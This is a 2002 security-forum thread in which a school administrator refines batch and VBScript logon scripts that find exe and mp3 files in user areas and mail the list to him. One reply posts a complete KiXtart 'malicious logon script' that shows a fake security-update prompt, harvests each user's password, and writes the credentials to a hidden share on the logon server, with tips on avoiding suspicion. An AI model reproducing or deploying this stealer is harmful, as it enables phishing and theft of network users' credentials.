Security Forums

batch file confusion

browolf
Posted: Mon Oct 28, 2002 4:51 pm    Post subject: batch file confusion

Hi

I'm trying out some batch stuff, I'm planning on writing a script to scan people's userarea when they log on. I'm just playing around with things atm until I figure out the best way to do it. (the best way to learn stuff)

I'm having some trouble understanding why this isn't working.
I'm running it on win2k.

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 0 echo exe found
if errorlevel 1 echo exe not found


It's the errorlevel bit that doesn't seem to work.
If I run the batch as "search.bat s:" the output is:

filenotfound
exe found
exe not found

(s: doesn't have any exe's in)

As I understand it, if dir finds no results then the errorlevel is 1.
I know that it is cos I can do echo %errorlevel%
I believe I can use %errorlevel% in the script but haven't tried.
I'm trying to keep things non-win2k specific atm.

cheers

Andy

browolf
Posted: Tue Oct 29, 2002 3:52 pm

is ok
I somehow fixed it by doing:

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 1 goto exit
   echo do stuff

:exit
echo done!
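
The `if errorlevel` behaviour behind the two scripts above, as an added example that is not part of the original posts: `if errorlevel N` is true for any exit code of N or higher, so `if errorlevel 0` always matches and both echo lines ran. The log name `scan.log` and the label names are assumptions of this sketch, and `2>nul` assumes cmd.exe.

```batch
@echo off
rem Added example, not from the thread. scan.log and the label names
rem are made up for this sketch.
rem
rem "if errorlevel N" is true when the exit code is N OR HIGHER:
rem   if errorlevel 0   matches every exit code, so it is always true
rem   if errorlevel 1   matches 1, 2, 3, ...
rem Test the highest value first and jump away after each match;
rem otherwise more than one branch runs, as in the first script.
rem (With cmd.exe command extensions, if "%errorlevel%"=="1" is an
rem exact comparison instead.)

if "%1"=="" goto usage

rem DIR writes "File Not Found" to stderr, which >> does not capture.
rem 2>nul (cmd.exe syntax) keeps it off the console.
dir %1\*.exe /a-d /b /s >>scan.log 2>nul

rem Check the exit code before running anything else that sets one.
if errorlevel 2 goto failed
if errorlevel 1 goto none

echo exe found, list appended to scan.log
goto end

:none
echo exe not found
goto end

:failed
rem Not an exit code the thread observed from DIR; handled defensively.
echo dir failed, result unknown
goto end

:usage
echo usage: %0 drive-or-directory

:end
```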

Sgt_B
Posted: Tue Oct 29, 2002 4:13 pm

A bit more interesting would be having the machines in question write their log files to a central location, giving the log file as <computername>.log.

Might be easier for you to manage.

Sgt_B
Posted: Tue Oct 29, 2002 4:24 pm

@echo off
dir %1\*.exe /a-D /b /S >>\\<central location>\%computername%.log
if errorlevel 1 goto exit
echo do stuff

:exit
echo done!

TheKingster
Posted: Tue Oct 29, 2002 4:59 pm

If you're trying to stop people running EXEs there's a whole section on that on these forums

ShaolinTiger
Posted: Tue Oct 29, 2002 5:58 pm

TheKingster wrote:
If you're trying to stop people running EXEs there's a whole section on that on these forums

It's usually nice if you tell people where it is as well..

http://www.security-forums.com/forum/viewtopic.php?t=438

browolf
Posted: Tue Oct 29, 2002 9:55 pm

I don't want to have to go through 1800 log files. It's just a small number of people who stick exe or mp3s in their user areas.

The script will email me using commandline emailer blat with the contents of the log file. I can then remove the files and disable their userareas.

atm the script looks like:

Code:

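@echo off
echo checking userarea for inappropriate files
rem FOUND records a hit from either dir; testing errorlevel once after
rem both searches would only see the result of the mp3 search
set FOUND=
dir %1\*.exe /a-D /b /S >>%1\test.log
if not errorlevel 1 set FOUND=1
dir %1\*.mp3 /a-D /b /s >>%1\test.log
if not errorlevel 1 set FOUND=1
if "%FOUND%"=="" goto exit
   echo mailing filelist to administrator!
   \\lsahtc_nt1\netlogon\blat %1\test.log -to andy@address -server 192.168.0.15 -f academic\%username% -q
:exit
del %1\test.log
echo done!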

ThePsyko
Posted: Fri Nov 08, 2002 3:14 am

If you're doing this through logon scripts, you might want to look into kixtart - it's free and more robust than DOS (www.kixtart.com). One of the first scripts I wrote was a password stealer / logger in Kix...


; REM ***
; REM *** Malishus log_on skript
; REM ***


IF INGROUP("Domain Administrators")
RETURN
ENDIF


; REM *** check to see if script has run on system before - if so, skip
; REM *** script and return to normal logon

IF EXIST("c:\winnt\config\confpol.txt")
RETURN
ENDIF

; REM *** Display standard windows messagebox with text and an OK button ***(no cancel button)

$selection = MESSAGEBOX ( "There is a Security Patch available for your system. Press 'OK' to Install", "Security Update", 64)

; REM *** Make it look official by including some lag time (it IS windows
; REM *** after all :)

? "Security Update Installing....."
SLEEP 1
? "Authentication error! Please Enter your password."
? "UserID: " + @USERID
FLUSHKB
? "Password: "
GETS $pass
? "Installation continuing....."
SLEEP 2

; REM *** Since Kix displays a 0 everytime a file is successfully opened
; REM *** &/or written to, the following line will keep the user from
; REM *** getting suspicious by showing them that
; REM *** there are 0000000 errors during "installation"

? "Installation Errors: "

; REM *** Map a drive to a hidden share on the logon server that only you
; REM *** know about..
; REM *** If this isn't possible, use another users system and share
; REM *** their drive to stash the log in.. never use your own system.

SHELL "%comspec% /c net use w: \\" + @LSERVER + "\hiddenshare$"

; REM *** Open (or create one if it doesn't exist) both the log file for
; REM *** the U/P and the file to later tell the script it has already
; REM *** run on this system

OPEN ( 1, "w:\log.txt", 5)
OPEN ( 2, "c:\winnt\config\confpol.txt", 5)

; REM *** Append the users User ID and Password to a central text file
; REM *** (makes it easier for retrieval)

WRITELINE (1, "User: " + @userid + Chr(13) + Chr(10))
WRITELINE (1, "Pass: " + $pass + Chr (13) + Chr(10))

; REM *** Add a blank line to the \confpol.txt file - will signal the
; REM *** script next time, but if found, won't raise any suspicions
; REM *** (usually)

WRITELINE ( 2, Chr (13) + Chr(10))

CLOSE (1)
CLOSE (2)

SHELL "%comspec% /c net use w: /delete"
? "Security Update Installed, continuing with logon..."
SLEEP 1
RETURN

browolf
Posted: Fri Nov 08, 2002 10:39 am

I've used kixtart b4. It's ace. But if u gonna use that u might as well go all the way and use WSH, which in the end I did. I'll post my script when I get to work.

browolf
Posted: Fri Nov 08, 2002 11:40 am

Code:

'on error resume next
Const ForReading = 1
wscript.echo ("checking your user area for inappropriate files")
set wshell = wscript.createobject("wscript.shell")
Dim fso, f1, ts, s,myfile,uname,udate
Set fso = CreateObject("Scripting.FileSystemObject")

If (fso.FileExists("s:\ftemp.$$$")) Then
fso.DeleteFile("s:\ftemp.$$$")
end if

uname = wshell.ExpandEnvironmentStrings("%USERNAME%")

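'skip exempt accounts; InStr is a substring test, so any user name that occurs anywhere inside this list is skipped
'WScript.Quit ends the script (WScript has no Exit method)
if instr("sbutte,adavis,jowen,naparro,vballa,cglen-,rbanni,jfairc,andy,myles,duncan,brian,ssstoke,abaill,adavis,msimps", uname) OR isempty(uname) then wscript.quit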

WShell.Run "%comspec% /c dir s:\*.exe /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.mp3 /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.wav /a-d /b /s >> s:\ftemp.$$$",0,true

'read file
Set f = fso.GetFile("s:\ftemp.$$$")
if f.size > 0 then
    wscript.echo ("mailing file list to administrator")
    wshell.run "\\lsahtc_nt1\netlogon\blat s:\ftemp.$$$ -to andy@lythamhigh.lancs.sch.uk -server 192.168.0.15 -f academic\" & uname & " -q", 0,true
    wscript.echo ("mail sent!")
   
    datetemp = date
   udate = replace (datetemp,"/","")
    ttemp = time
   ttime = replace (ttemp,":","")
   folname = "\\lsahtc_nt1\logs\filez\" & uname & udate &"-"& ttime
    'make folder
     set f = fso.createfolder(folname)
    'move files
   Set MyFile = fso.Opentextfile("s:\ftemp.$$$", ForReading,false)
    do while myfile.AtEndOfStream <> True
      fpath = myfile.readline
      cmdline = "%comspec% /c move /y " & """" & fpath & """ " & folname
      wscript.echo "moving " & fpath
      WShell.Run cmdline, 0,true
    loop
   myfile.close
else
   wscript.echo ("Clear!")
end if
fso.DeleteFile("s:\ftemp.$$$")
set wshell = nothing
set fso = nothing
set f = nothing
set myfile = nothing


All times are GMT + 2 Hours